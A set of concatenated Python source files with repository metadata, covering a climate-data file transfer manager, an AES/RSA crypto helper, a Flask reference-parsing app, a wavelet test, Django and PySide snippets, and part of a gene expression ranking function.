remote_path, _ = os.path.split(files[0].remote_path)
msg = 'Checking {} files in {}'.format(datatype, remote_path)
print_line(msg, self._event_list)
if files[0].transfer_type == 'globus':
from lib.globus_interface import get_ls as globus_ls
remote_contents = globus_ls(
client=client,
path=remote_path,
endpoint=self._config['simulations'][case]['remote_uuid'])
elif files[0].transfer_type == 'sftp':
from lib.ssh_interface import get_ls as ssh_ls
remote_contents = ssh_ls(
client=client,
remote_path=remote_path)
remote_names = [x['name'] for x in remote_contents]
for df in files:
if df.name not in remote_names:
msg = 'Unable to find file {name} at {remote_path}'.format(
name=df.name,
remote_path=remote_path)
print_message(msg, 'error')
found_all = False
if not found_all:
return False
else:
msg = 'found all remote files for {}'.format(case)
print_message(msg, 'ok')
return True
def terminate_transfers(self):
self.kill_event.set()
for thread in self.thread_list:
msg = 'terminating {}, this may take a moment'.format(thread.name)
print_line(msg, self._event_list)
thread.join()
def print_db(self):
for df in DataFile.select():
print {
'case': df.case,
'type': df.datatype,
'name': df.name,
'local_path': df.local_path,
'remote_path': df.remote_path,
'transfer_type': df.transfer_type,
}
def add_files(self, data_type, file_list):
"""
Add files to the database
Parameters:
data_type (str): the data_type of the new files
file_list (list): a list of dictionaries in the format
local_path (str): path to the file,
case (str): the case these files belong to
name (str): the filename
remote_path (str): the remote path of these files, optional
transfer_type (str): the transfer type of these files, optional
year (int): the year of the file, optional
month (int): the month of the file, optional
remote_uuid (str): remote globus endpoint id, optional
remote_hostname (str): remote hostname for sftp transfer, optional
"""
try:
new_files = list()
for file in file_list:
new_files.append({
'name': file['name'],
'local_path': file['local_path'],
'local_status': file.get('local_status', FileStatus.NOT_PRESENT.value),
'datatype': data_type,
'case': file['case'],
'year': file.get('year', 0),
'month': file.get('month', 0),
'remote_uuid': file.get('remote_uuid', ''),
'remote_hostname': file.get('remote_hostname', ''),
'remote_path': file.get('remote_path', ''),
'remote_status': FileStatus.NOT_PRESENT.value,
'local_size': 0,
'transfer_type': file.get('transfer_type', 'local')
})
step = 50
for idx in range(0, len(new_files), step):
DataFile.insert_many(
new_files[idx: idx + step]).execute()
except Exception as e:
print_debug(e)
def update_local_status(self):
"""
Update the database with the local status of the expected files
Return True if there was new local data found, False othewise
"""
try:
query = (DataFile
.select()
.where(
(DataFile.local_status == FileStatus.NOT_PRESENT.value) |
(DataFile.local_status == FileStatus.IN_TRANSIT.value)))
printed = False
change = False
for datafile in query.execute():
marked = False
if os.path.exists(datafile.local_path):
if datafile.local_status == FileStatus.NOT_PRESENT.value or datafile.local_status == FileStatus.IN_TRANSIT.value:
datafile.local_status = FileStatus.PRESENT.value
marked = True
change = True
else:
if datafile.transfer_type == 'local':
msg = '{case} transfer_type is local, but {filename} is not present'.format(
case=datafile.case, filename=datafile.name)
logging.error(msg)
if not printed:
print_line(msg, self._event_list)
printed = True
if datafile.local_status == FileStatus.PRESENT.value:
datafile.local_status = FileStatus.NOT_PRESENT.value
marked = True
if marked:
datafile.save()
except Exception as e:
print_debug(e)
return change
def all_data_local(self):
"""
Returns True if all data is local, False otherwise
"""
try:
query = (DataFile
.select()
.where(
(DataFile.local_status == FileStatus.NOT_PRESENT.value) |
(DataFile.local_status == FileStatus.IN_TRANSIT.value)))
missing_data = query.execute()
# if any of the data is missing, not all data is local
if missing_data:
logging.debug('All data is not local, missing the following')
logging.debug([x.name for x in missing_data])
return False
except Exception as e:
print_debug(e)
logging.debug('All data is local')
return True
def transfer_needed(self, event_list, event, config):
"""
Start a transfer job for any files that arent local, but do exist remotely
Globus user must already be logged in
"""
# required files dont exist locally, do exist remotely
# or if they do exist locally have a different local and remote size
target_files = list()
try:
q = (DataFile
.select(DataFile.case)
.where(
DataFile.local_status == FileStatus.NOT_PRESENT.value))
caselist = [x.case for x in q.execute()]
if not caselist or len(caselist) == 0:
return
cases = list()
for case in caselist:
if case not in cases:
cases.append(case)
for case in cases:
q = (DataFile
.select()
.where(
(DataFile.case == case) &
(DataFile.local_status == FileStatus.NOT_PRESENT.value)))
required_files = [x for x in q.execute()]
for file in required_files:
if file.transfer_type == 'local':
required_files.remove(file)
if not required_files:
msg = 'ERROR: all missing files are marked as local'
print_line(msg, event_list)
return
# mark files as in-transit so we dont double-copy
# cant do a bulk update since there may be to many records for the db to handle
step = 50
for idx in range(0, len(required_files), step):
q = (DataFile
.update({DataFile.local_status: FileStatus.IN_TRANSIT})
.where(DataFile.name << [x.name for x in required_files[idx: step + idx]]))
q.execute()
for file in required_files:
target_files.append({
'local_path': file.local_path,
'remote_path': file.remote_path,
})
if required_files[0].transfer_type == 'globus':
from lib.globus_interface import transfer as globus_transfer
from globus_cli.services.transfer import get_client as get_globus_client
msg = 'Starting globus file transfer of {} files'.format(
len(required_files))
print_line(msg, event_list)
msg = 'See https://www.globus.org/app/activity for transfer details'
print_line(msg, event_list)
client = get_globus_client()
if not self.verify_remote_files(client=client, case=case):
return False
remote_uuid = required_files[0].remote_uuid
local_uuid = self._config['global']['local_globus_uuid']
thread_name = '{}_globus_transfer'.format(required_files[0].case)
_args = (client, remote_uuid,
local_uuid, target_files,
self.kill_event)
thread = Thread(
target=globus_transfer,
name=thread_name,
args=_args)
self.thread_list.append(thread)
thread.start()
elif required_files[0].transfer_type == 'sftp':
from lib.ssh_interface import get_ssh_client
msg = 'Starting sftp file transfer of {} files'.format(
len(required_files))
print_line(msg, event_list)
client = get_ssh_client(required_files[0].remote_hostname)
if not self.verify_remote_files(client=client, case=case):
return False
thread_name = '{}_sftp_transfer'.format(required_files[0].case)
_args = (target_files, client, self.kill_event)
thread = Thread(
target=self._ssh_transfer,
name=thread_name,
args=_args)
self.thread_list.append(thread)
thread.start()
except Exception as e:
print_debug(e)
return False
def _ssh_transfer(self, target_files, client, event):
from lib.ssh_interface import transfer as ssh_transfer
sftp_client = client.open_sftp()
for file in target_files:
if event.is_set():
return
_, filename = os.path.split(file['local_path'])
msg = 'sftp transfer from {} to {}'.format(
file['remote_path'], file['local_path'])
logging.info(msg)
msg = 'starting sftp transfer for {}'.format(filename)
print_line(msg, self._event_list)
ssh_transfer(sftp_client, file)
msg = 'sftp transfer complete for {}'.format(filename)
print_line(msg, self._event_list)
msg = self.report_files_local()
print_line(msg, self._event_list)
def report_files_local(self):
"""
Return a string in the format 'X of Y files availabe locally' where X is the number here, and Y is the total
"""
q = (DataFile
.select(DataFile.local_status)
.where(DataFile.local_status == FileStatus.PRESENT.value))
local = len([x.local_status for x in q.execute()])
q = (DataFile.select(DataFile.local_status))
total = len([x.local_status for x in q.execute()])
msg = '{local}/{total} files available locally or {prec:.2f}%'.format(
local=local, total=total, prec=((local*1.0)/total)*100)
return msg
def get_file_paths_by_year(self, datatype, case, start_year=None, end_year=None):
"""
Return paths to files that match the given type, start, and end year
Parameters:
datatype (str): the type of data
case (str): the name of the case to return files for
monthly (bool): is this datatype monthly frequency
start_year (int): the first year to return data for
end_year (int): the last year to return data for
"""
try:
if start_year and end_year:
if datatype in ['climo_regrid', 'climo_native', 'ts_regrid', 'ts_native']:
query = (DataFile
.select()
.where(
(DataFile.month == end_year) &
(DataFile.year == start_year) &
(DataFile.case == case) &
(DataFile.datatype == datatype) &
(DataFile.local_status == FileStatus.PRESENT.value)))
else:
query = (DataFile
.select()
.where(
(DataFile.year <= end_year) &
(DataFile.year >= start_year) &
(DataFile.case == case) &
(DataFile.datatype == datatype) &
(DataFile.local_status == FileStatus.PRESENT.value)))
else:
query = (DataFile
.select()
.where(
(DataFile.case == case) &
(DataFile.datatype == datatype) &
(DataFile.local_status == FileStatus.PRESENT.value)))
datafiles = query.execute()
if datafiles is None or len(datafiles) == 0:
return None
return [x.local_path for x in datafiles]
except Exception as e:
print_debug(e)
| 44.313364 | 149 | 0.475284 | [
"MIT"
] | jhkennedy/processflow | lib/filemanager.py | 28,848 | Python |
import os
import base64
from Crypto import Random
from Crypto.Cipher import AES
from Crypto.PublicKey import RSA
from Crypto.Hash import MD5
from Crypto.Hash import SHA
from Crypto.Hash import SHA256
## needs to be imported from hashlib, libcrypto
## versions do not have a block_size member var
from hashlib import sha256 as HMAC_HASH
from hmac import HMAC as HMAC_FUNC
try:
from Crypto.Cipher import PKCS1_OAEP as RSA_PAD_SCHEME
except ImportError:
RSA_PAD_SCHEME = None
try:
from Crypto.Signature import PKCS1_v1_5 as RSA_SGN_SCHEME
except ImportError:
RSA_SGN_SCHEME = None
## needed because RSAobj::operator== fails on None
RSA_NULL_KEY_OBJ = RSA._RSAobj(None, None)
AES_KEY_BIT_SIZE = 32 * 8
AES_KEY_DIR_NAME = "./"
AES_RAW_KEY_FILE = "aes_key.dat"
AES_MSG_PAD_SIZE = 64
RSA_KEY_BIT_SIZE = 8192
RSA_KEY_FMT_NAME = "PEM"
RSA_KEY_DIR_NAME = "./"
RSA_PUB_KEY_FILE = "rsa_pub_key.pem"
RSA_PRI_KEY_FILE = "rsa_pri_key.pem"
DATA_MARKER_BYTE = "\x01"
DATA_PARTIT_BYTE = "\n"
UNICODE_ENCODING = "utf-8"
PWRD_HASH_ROUNDS = 1024 ## stretching KDF (anti-BFA)
USR_DB_SALT_SIZE = 16 ## bytes
MIN_AES_KEY_SIZE = 16 ## bytes
MIN_PASSWORD_LEN = 12 ## bytes
## hashlib.sha{1,256}
MD5LEG_HASH_FUNC = MD5.new
SHA256_HASH_FUNC = SHA256.new
GLOBAL_RAND_POOL = Random.new()
def null_encode(s): return s
def null_decode(s): return s
def safe_decode(s, decode_func = base64.b64decode):
try:
r = decode_func(s)
except:
## if <s> is not a base64-encoded string, then
## it probably contains plaintext (UTF-8) data
r = s
return r
def extract_message_and_auth_code(raw_data_blob):
if (raw_data_blob[0] != DATA_MARKER_BYTE):
return ("", "")
i = 1
j = raw_data_blob.find(DATA_MARKER_BYTE, i)
## check if a MAC is included after the payload
if (j != -1):
msg = raw_data_blob[i : j]
mac = raw_data_blob[j + 1: ]
else:
msg = raw_data_blob[i: ]
mac = ""
return (msg, mac)
def encrypt_sign_message(aes_obj, raw_msg, use_macs):
assert(type(raw_msg) == str)
assert(isinstance(aes_obj, aes_cipher))
ret_enc_msg = ""
ret_msg_mac = ""
if (use_macs):
## enc_msg_mac := (enc_msg, msg_mac)
enc_msg_mac = aes_obj.encrypt_sign_bytes(raw_msg)
ret_enc_msg = DATA_MARKER_BYTE + enc_msg_mac[0]
ret_msg_mac = DATA_MARKER_BYTE + enc_msg_mac[1]
else:
raw_enc_msg = aes_obj.encrypt_encode_bytes(raw_msg)
ret_enc_msg = DATA_MARKER_BYTE + raw_enc_msg
return (ret_enc_msg + ret_msg_mac + DATA_PARTIT_BYTE)
def decrypt_auth_message(aes_obj, raw_msg, use_macs):
assert(type(raw_msg) == str)
assert(isinstance(aes_obj, aes_cipher))
## enc_msg_mac := (enc_msg, msg_mac)
enc_msg_mac = extract_message_and_auth_code(raw_msg)
## missing lead marker byte
if (len(enc_msg_mac[0]) == 0):
return ""
if (use_macs):
dec_msg = aes_obj.auth_decrypt_bytes(enc_msg_mac, safe_decode)
else:
dec_msg = aes_obj.decode_decrypt_bytes(enc_msg_mac[0], safe_decode)
return dec_msg
def verify_message_auth_code(our_mac, msg_mac, ses_key):
## two rounds closes a timing side-channel
msg_mac = HMAC_FUNC(ses_key, msg_mac, HMAC_HASH)
our_mac = HMAC_FUNC(ses_key, our_mac, HMAC_HASH)
msg_mac = msg_mac.digest()
our_mac = our_mac.digest()
num_val = 0
if (len(msg_mac) != len(our_mac)):
return False
## fixed linear-time comparison closes another
for i in xrange(len(our_mac)):
num_val += (our_mac[i] == msg_mac[i])
return (num_val == len(our_mac))
def int32_to_str(n):
assert(n >= (0 ))
assert(n < (1 << 32))
s = ""
s += "%c" % ((n >> 0) & 0xff)
s += "%c" % ((n >> 8) & 0xff)
s += "%c" % ((n >> 16) & 0xff)
s += "%c" % ((n >> 24) & 0xff)
return s
def str_to_int32(s):
n = 0
n += (ord(s[0]) << 0)
n += (ord(s[1]) << 8)
n += (ord(s[2]) << 16)
n += (ord(s[3]) << 24)
return n
def pad_str(msg, bs):
num = bs - (len(msg) % bs)
ext = num * chr(num)
return (msg + ext)
def unpad_str(msg, bs):
idx = len(msg) - 1
cnt = ord(msg[idx: ])
return msg[0: -cnt]
def read_file(file_name, file_mode):
try:
f = open(file_name, file_mode)
s = f.read()
f = f.close()
return s
except IOError:
pass
return ""
def write_file(file_name, file_mode, file_data):
try:
f = open(file_name, file_mode)
os.fchmod(f.fileno(), 0600)
f.write("%s" % file_data)
f = f.close()
except IOError:
pass
class rsa_cipher:
def __init__(self, key_dir = RSA_KEY_DIR_NAME):
self.set_rnd_gen(Random.new())
self.set_instance_keys(key_dir)
self.set_pad_scheme(RSA_PAD_SCHEME)
self.set_sgn_scheme(RSA_SGN_SCHEME)
def set_rnd_gen(self, rnd_gen): self.rnd_gen = rnd_gen
def set_pub_key(self, pub_key): self.pub_key = pub_key
def set_pri_key(self, pri_key): self.pri_key = pri_key
def get_pub_key(self): return self.pub_key
def get_pri_key(self): return self.pri_key
def sanity_test_keys(self):
pk = (self.pri_key.publickey())
b0 = (pk == self.pub_key)
b1 = (pk.exportKey(RSA_KEY_FMT_NAME) == self.pub_key.exportKey(RSA_KEY_FMT_NAME))
b2 = ((not self.pub_key.has_private()) and self.pri_key.has_private())
return (b0 and b1 and b2)
def set_pad_scheme(self, scheme):
if (scheme == None):
self.enc_pad_scheme = None
self.dec_pad_scheme = None
else:
self.enc_pad_scheme = scheme.new(self.pub_key)
self.dec_pad_scheme = scheme.new(self.pri_key)
def set_sgn_scheme(self, scheme):
if (scheme == None):
self.msg_sign_scheme = None
self.msg_auth_scheme = None
else:
self.msg_sign_scheme = scheme.new(self.pri_key)
self.msg_auth_scheme = scheme.new(self.pub_key)
def set_instance_keys(self, key_dir):
if (key_dir == None):
self.set_pub_key(RSA_NULL_KEY_OBJ)
self.set_pri_key(RSA_NULL_KEY_OBJ)
return
if (not self.import_keys(key_dir)):
self.generate_keys()
assert(self.sanity_test_keys())
def generate_keys(self, num_bits = RSA_KEY_BIT_SIZE):
self.set_pri_key(RSA.generate(num_bits, self.rnd_gen.read))
self.set_pub_key(self.pri_key.publickey())
return True
def import_key(self, key_str):
return (RSA.importKey(key_str))
def import_keys(self, key_dir):
assert(len(key_dir) == 0 or key_dir[-1] == '/')
pub_key_str = read_file(key_dir + RSA_PUB_KEY_FILE, "r")
pri_key_str = read_file(key_dir + RSA_PRI_KEY_FILE, "r")
if (len(pub_key_str) != 0 and len(pri_key_str) != 0):
self.set_pub_key(self.import_key(pub_key_str))
self.set_pri_key(self.import_key(pri_key_str))
return True
return False
def export_keys(self, key_dir):
assert(len(key_dir) != 0)
assert(key_dir[-1] == '/')
if (not os.path.isdir(key_dir)):
os.mkdir(key_dir, 0700)
write_file(key_dir + RSA_PUB_KEY_FILE, "w", self.pub_key.exportKey(RSA_KEY_FMT_NAME))
write_file(key_dir + RSA_PRI_KEY_FILE, "w", self.pri_key.exportKey(RSA_KEY_FMT_NAME))
## these make sure that any native unicode inputs are converted
## to standard (UTF-8 encoded byte sequences) strings, otherwise
## crypto operations might be undefined
def encrypt_encode_bytes_utf8(self, raw_bytes, encode_func = base64.b64encode):
return (self.encrypt_encode_bytes(raw_bytes.encode(UNICODE_ENCODING), encode_func))
def decode_decrypt_bytes_utf8(self, enc_bytes, decode_func = base64.b64decode):
return (self.decode_decrypt_bytes(enc_bytes.encode(UNICODE_ENCODING), decode_func))
def encrypt_encode_bytes(self, raw_bytes, encode_func = base64.b64encode):
assert(type(raw_bytes) == str)
assert(len(raw_bytes) != 0)
assert(self.pub_key.size() >= (len(raw_bytes) * 8))
assert(ord(raw_bytes[0]) != 0)
if (self.enc_pad_scheme != None):
enc_bytes = self.enc_pad_scheme.encrypt(raw_bytes)
else:
## NOTE: RSAobj.encrypt() returns a tuple (!)
enc_bytes = self.pub_key.encrypt(raw_bytes, "")[0]
return (encode_func(enc_bytes))
def decode_decrypt_bytes(self, enc_bytes, decode_func = base64.b64decode):
assert(type(enc_bytes) == str)
assert(len(enc_bytes) != 0)
## assert((self.pri_key.size() + 1) == (len(decode_func(enc_bytes)) * 8))
enc_bytes = decode_func(enc_bytes)
if (self.dec_pad_scheme != None):
dec_bytes = self.dec_pad_scheme.decrypt(enc_bytes)
else:
dec_bytes = self.pri_key.decrypt(enc_bytes)
return dec_bytes
def sign_bytes_utf8(self, msg_bytes):
return (self.sign_bytes(msg_bytes.encode(UNICODE_ENCODING)))
def auth_bytes_utf8(self, msg_bytes, sig_bytes):
return (self.auth_bytes(msg_bytes.encode(UNICODE_ENCODING), sig_bytes))
def sign_bytes(self, msg_bytes):
assert(type(msg_bytes) == str)
assert(len(msg_bytes) != 0)
msg_bytes = SHA256_HASH_FUNC(msg_bytes)
if (self.msg_sign_scheme != None):
## scheme.sign() expects an object from Crypto.Hash
ret = self.msg_sign_scheme.sign(msg_bytes)
else:
## RSAobj.sign() returns a tuple
ret = str(self.pri_key.sign(msg_bytes.digest(), "")[0])
assert(type(ret) == str)
return ret
def auth_bytes(self, msg_bytes, sig_bytes):
assert(type(msg_bytes) == str)
assert(type(sig_bytes) == str)
assert(len(msg_bytes) != 0)
msg_bytes = SHA256_HASH_FUNC(msg_bytes)
if (self.msg_auth_scheme != None):
## scheme.verify() expects an object from Crypto.Hash
ret = self.msg_auth_scheme.verify(msg_bytes, sig_bytes)
else:
## RSAobj.verify() expects a tuple
ret = (self.pub_key.verify(msg_bytes.digest(), (long(sig_bytes), 0L)))
assert(type(ret) == bool)
return ret
class aes_cipher:
def __init__(self, key_dir = AES_KEY_DIR_NAME, padding_length = AES_MSG_PAD_SIZE):
assert(type(key_dir) == str)
assert((padding_length % 16) == 0)
self.pad_length = padding_length
self.random_gen = Random.new()
self.khash_func = SHA256_HASH_FUNC
self.set_instance_key(key_dir)
def set_instance_key(self, key_dir):
if (not self.import_key(key_dir)):
self.set_key(self.generate_key(""))
def generate_key(self, raw_key, key_len = AES_KEY_BIT_SIZE):
if (len(raw_key) == 0):
key_str = self.random_gen.read(key_len / 8)
key_str = self.khash_func(key_str)
else:
key_str = self.khash_func(raw_key)
return (key_str.digest())
def get_key(self): return self.key_string
def set_key(self, s): self.key_string = s
def import_key(self, key_dir):
assert(len(key_dir) == 0 or key_dir[-1] == '/')
key_str = read_file(key_dir + AES_RAW_KEY_FILE, "rb")
if (len(key_str) != 0):
self.set_key(key_str)
return True
return False
def export_key(self, key_dir):
assert(len(key_dir) != 0)
assert(key_dir[-1] == '/')
if (not os.path.isdir(key_dir)):
os.mkdir(key_dir, 0700)
write_file(key_dir + AES_RAW_KEY_FILE, "wb", self.get_key())
def encrypt_encode_bytes_utf8(self, raw_bytes, encode_func = base64.b64encode):
return (self.encrypt_encode_bytes(raw_bytes.encode(UNICODE_ENCODING), encode_func))
def decode_decrypt_bytes_utf8(self, enc_bytes, decode_func = base64.b64decode):
return (self.decode_decrypt_bytes(enc_bytes.encode(UNICODE_ENCODING), decode_func))
def encrypt_encode_bytes(self, raw_bytes, encode_func = base64.b64encode):
assert(type(raw_bytes) == str)
assert(len(raw_bytes) != 0)
ini_vector = self.random_gen.read(AES.block_size)
aes_object = AES.new(self.key_string, AES.MODE_CBC, ini_vector)
pad_bytes = pad_str(raw_bytes, self.pad_length)
enc_bytes = aes_object.encrypt(pad_bytes)
return (encode_func(ini_vector + enc_bytes))
def decode_decrypt_bytes(self, enc_bytes, decode_func = base64.b64decode):
assert(type(enc_bytes) == str)
assert(len(enc_bytes) != 0)
enc_bytes = decode_func(enc_bytes)
ini_vector = enc_bytes[0: AES.block_size]
aes_object = AES.new(self.key_string, AES.MODE_CBC, ini_vector)
dec_bytes = aes_object.decrypt(enc_bytes[AES.block_size: ])
dec_bytes = unpad_str(dec_bytes, self.pad_length)
return dec_bytes
def encrypt_sign_bytes_utf8(self, raw_msg, encode_func = base64.b64encode):
return (self.encrypt_sign_bytes(raw_msg.encode(UNICODE_ENCODING), encode_func))
def auth_decrypt_bytes_utf8(self, (enc_msg, msg_mac), decode_func = base64.b64decode):
return (self.auth_decrypt_bytes((enc_msg.encode(UNICODE_ENCODING), msg_mac.encode(UNICODE_ENCODING)), decode_func))
def encrypt_sign_bytes(self, raw_msg, encode_func = base64.b64encode):
assert(type(raw_msg) == str)
## encrypt, then sign (HMAC = H((K ^ O) | H((K ^ I) | M)))
enc_msg = self.encrypt_encode_bytes(raw_msg, null_encode)
msg_mac = HMAC_FUNC(self.get_key(), enc_msg, HMAC_HASH)
msg_mac = encode_func(msg_mac.digest())
enc_msg = encode_func(enc_msg)
return (enc_msg, msg_mac)
def auth_decrypt_bytes(self, (enc_msg, msg_mac), decode_func = base64.b64decode):
assert(type(enc_msg) == str)
assert(type(msg_mac) == str)
## auth, then decrypt
msg_mac = decode_func(msg_mac)
enc_msg = decode_func(enc_msg)
our_mac = HMAC_FUNC(self.get_key(), enc_msg, HMAC_HASH)
our_mac = our_mac.digest()
if (verify_message_auth_code(our_mac, msg_mac, self.get_key())):
return (self.decode_decrypt_bytes(enc_msg, null_decode))
## counts as false
return ""
| 27.33617 | 117 | 0.721357 | [
"MIT"
] | Anarchid/uberserver | CryptoHandler.py | 12,848 | Python |
from flask import Flask
from flask import request, session, render_template, json, Response, jsonify, make_response, send_file, redirect, url_for
import requests
import xml.etree.ElementTree as ET
import lxml
import pandas as pd
import re
app = Flask(__name__)
@app.route('/')
def index():
return render_template('process_fulltext.html')
@app.route('/process_fulltext', methods = ['GET', 'POST'])
def process_fulltext():
upload = request.files.get('file', '').read() #puts the uploaded file (in the request)
url = 'http://localhost:8070/api/processFulltextDocument'
files = dict(input=upload, teiCoordinates="biblStruct")
r = requests.post(url, files=files)
return render_template('process_fulltext.html', r=r.text)
# takes a string and removes xml element inside
def clean(text):
text = re.sub("<[^>]+>","", text)
text = re.sub("^\s+|\s+$","", text)
return text
#parses the tei document and creates list of dictionaries out of tei elements
def parse_tei(xml):
#data = open(xml)
data = xml.split('\n')
refs = []
ref = []
start = False
title = ""
name = ""
date = ""
names = []
year = ""
#art_name = re.sub(".*\/","")
old_ref = {"title": "", "name": "", "date": "", "year_pub": ""}
for line in data:
if re.match(".*<date",line) and start == False:
year = re.sub(".*when\=\"","",line)
year = re.sub("\".*","",year)[0:4]
if start == False and re.match(".*<back",line):
start = True
if start == False:
continue
if re.match(".*<biblStruct",line):
if title == "":
continue
ref = {"title": title, "name": names, "date": date, "year_pub": year}
if ref["title"] == old_ref["title"]:
continue
else:
refs.append(ref)
olf_ref = ref
names = []
if re.match(".*<title.*type=\"main\"",line):
title = clean(line)
if re.match(".*<persName",line):
forename = re.sub("<\/forename.*","",line)
forename = clean(forename)
surname = re.sub(".*<surname","",line)
surname = clean(surname)
surname = re.sub(">",". ",surname)
name = forename+surname
names.append(name)
if re.match(".*<date",line):
date = re.sub(".*when\=\"","",line)
date = re.sub("\".*","",date)
date = date[0:4]
return refs
# sends request to grobid api to process the pdf and returns data in dataframe to template view
@app.route('/process_references', methods = ['GET', 'POST'])
def process_references():
upload = request.files.get('file', '').read() #puts the uploaded file (in the request)
url = 'http://localhost:8070/api/processFulltextDocument'
files = dict(input=upload, teiCoordinates="biblStruct")
r = requests.post(url, files=files)
tei_list = parse_tei(r.text)
# increase the column width of pd (standard is only 50px)
pd.set_option('display.max_colwidth', -1)
df1 = pd.DataFrame(tei_list)
# removing year_pub column
df1 = df1.drop('year_pub', axis=1)
df2 = df1.to_json()
df1 = df1.to_html()
# changing css class in html for dataframe output
df1 = re.sub("dataframe", "myTable", df1)
return render_template('process_fulltext.html', df1=df1, df2=df2)
if __name__ == '__main__':
app.run(debug=True) | 27.473684 | 121 | 0.646232 | [
"Apache-2.0"
] | DARIAH-ERIC/DESIR-CodeSprint-TrackA-TextMining | TrackA_python/codesprintapp/views.py | 3,132 | Python |
import math
import numpy as np
from cpp2py_test.bior_2d_forward_test1 import original_bior_2d_forward, bior15_coef
def bior_2d_forward(img):
assert img.shape[0] == img.shape[1]
N = img.shape[0]
iter_max = int(math.log2(N))
for iter in range(iter_max):
coeffs2 = pywt.dwt2(img[:N, :N], 'bior1.5', mode='periodic')
LL, (LH, HL, HH) = coeffs2
img[:N//2, :N//2] = LL[2: -2, 2: -2]
img[N//2:N, N//2:N] = HH[2: -2, 2: -2]
img[:N//2, N//2:N] = -HL[2: -2, 2: -2]
img[N//2:N, :N//2] = -LH[2: -2, 2: -2]
N //= 2
return img
if __name__ == '__main__':
import cv2
import pywt
import matplotlib.pyplot as plt
img = cv2.imread('Cameraman256.png', cv2.IMREAD_GRAYSCALE)
img = img.astype(np.float64)
# img = img[0:8, 0:8]
# original way
original_bior_img = original_bior_2d_forward(img)
# my way
bior_img = bior_2d_forward(img.copy())
# a, b = 0, 8
# c, d = 0, 8
# print('original_bior_img\n', original_bior_img[a:b, c:d].astype(np.int))
# print('bior_img\n', bior_img[a:b, c:d].astype(np.int))
# print('max original_bior_img', np.max(original_bior_img))
# print('min original_bior_img', np.min(original_bior_img))
#
# print('max bior_img', np.max(bior_img))
# print('min bior_img', np.min(bior_img))
diff = original_bior_img - bior_img
print('sum of diff', np.sum(np.abs(diff)))
print('max of diff', np.max(np.abs(diff)))
cv2.imshow('original_bior_img', original_bior_img)
cv2.imshow('bior_img', bior_img)
cv2.imshow('diff', diff)
cv2.waitKey()
| 29.454545 | 83 | 0.606173 | [
"MIT"
] | oleges1/denoising_project | BM3D_py/cpp2py_test/bior_2d_forward_test2.py | 1,620 | Python |
"""mysite URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('admin/', admin.site.urls),
path('blog/', include('blog.urls'))
]
| 34.652174 | 77 | 0.702635 | [
"MIT"
] | vadonmo/django | mysite/mysite/urls.py | 797 | Python |
# ReID Online Upload Service | 28 | 28 | 0.821429 | [
"MIT"
] | MikeCun/PersonReID | upload/__init__.py | 28 | Python |
from PySide import QtGui, QtCore
from AttributeWidgetImpl import AttributeWidget
class ScalarWidget(AttributeWidget):
def __init__(self, attribute, parentWidget=None, addNotificationListener = True):
super(ScalarWidget, self).__init__(attribute, parentWidget=parentWidget, addNotificationListener = addNotificationListener)
hbox = QtGui.QHBoxLayout()
self._widget = QtGui.QLineEdit(self)
validator = QtGui.QDoubleValidator(self)
validator.setDecimals(3)
self._widget.setValidator(validator)
hbox.addWidget(self._widget, 1)
hbox.addStretch(0)
hbox.setContentsMargins(0, 0, 0, 0)
self.setLayout(hbox)
self.setSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Fixed)
self.updateWidgetValue()
if self.isEditable():
self._widget.editingFinished.connect(self._invokeSetter)
else:
self._widget.setReadOnly(True)
def getWidgetValue(self):
return float(self._widget.text())
def setWidgetValue(self, value):
self._widget.setText(str(round(value, 4)))
@classmethod
def canDisplay(cls, attribute):
return(
attribute.getDataType() == 'Scalar' or
attribute.getDataType() == 'Float32' or
attribute.getDataType() == 'Float64'
)
ScalarWidget.registerPortWidget()
| 31.244444 | 131 | 0.667141 | [
"BSD-3-Clause"
] | FabricExile/Kraken | Python/kraken/ui/DataTypeWidgets/ScalarWidgetImpl.py | 1,406 | Python |
# Author: F. Alex Wolf (http://falexwolf.de)
"""Differential Gene Expression Analysis
This is a Beta Version of a tool for differential gene expression testing
between sets detected in previous tools. Tools such as dpt, cluster,...
"""
import numpy as np
from scipy.sparse import issparse
from .. import utils
from .. import logging as logg
from ..preprocessing import simple
def rank_genes_groups(
adata,
groupby,
groups='all',
group_reference=None,
n_genes=100,
compute_distribution=False,
only_positive=True,
copy=False):
"""Rank genes according to differential expression [Wolf17]_.
Rank genes by differential expression. By default, a t-test-like ranking is
used, in which means are normalized with variances. Soon, a Wilcoxon-rank
test and other alternatives will be provided.
Parameters
----------
adata : `AnnData`
Annotated data matrix.
groupby : `str`
The key of the sample grouping to consider.
groups : `str`, `list`, optional (default: `'all'`)
Subset of groups, e.g. `['g1', 'g2', 'g3']`, to which comparison shall
be restricted. If not passed, a ranking will be generated for all
groups.
group_reference : `str` or `None`, optional (default: `None`)
If `None`, compare each group to the union of the rest of the group. If
a group identifier, the comparison will be with respect to this group.
n_genes : `int` (default: 100)
How many genes to rank by default.
compute_distribution : `bool`
If `True`, also computes the distribution for top-ranked genes, which
can be visualized using `sc.pl.rank_genes_groups_violin(adata)`.
Returns
-------
rank_genes_groups_gene_zscores : np.ndarray of dtype float (adata.add)
Array of shape (number of comparisons) × (number of genes) storing the
zscore of the each gene for each test.
rank_genes_groups_gene_names : np.ndarray of dtype str (adata.add)
Array of shape (number of comparisons). Stores the labels for each comparison,
for example "C1 vs. C2" when comparing category 'C1' with 'C2'.
"""
logg.info('find differentially expressed genes', r=True)
adata = adata.copy() if copy else adata
n_genes_user = n_genes
utils.check_adata(adata)
# for clarity, rename variable
groups_order = groups
if isinstance(groups_order, list) and isinstance(groups_order[0], int):
groups_order = [str(n) for n in groups_order]
if group_reference is not None and group_reference not in set(groups_order):
groups_order += [group_reference]
if (group_reference is not None
and group_reference not in set(adata.add[groupby + '_order'])):
raise ValueError('group_reference = {} needs to be one of groupby = {}.'
.format(group_reference, groupby))
groups_order, groups_masks = utils.select_groups(
adata, groups_order, groupby)
adata.add['rank_genes_groups'] = groupby
adata.add['rank_genes_groups_order'] = groups_order
X = adata.X
# loop over all masks and compute means, variances and sample numbers
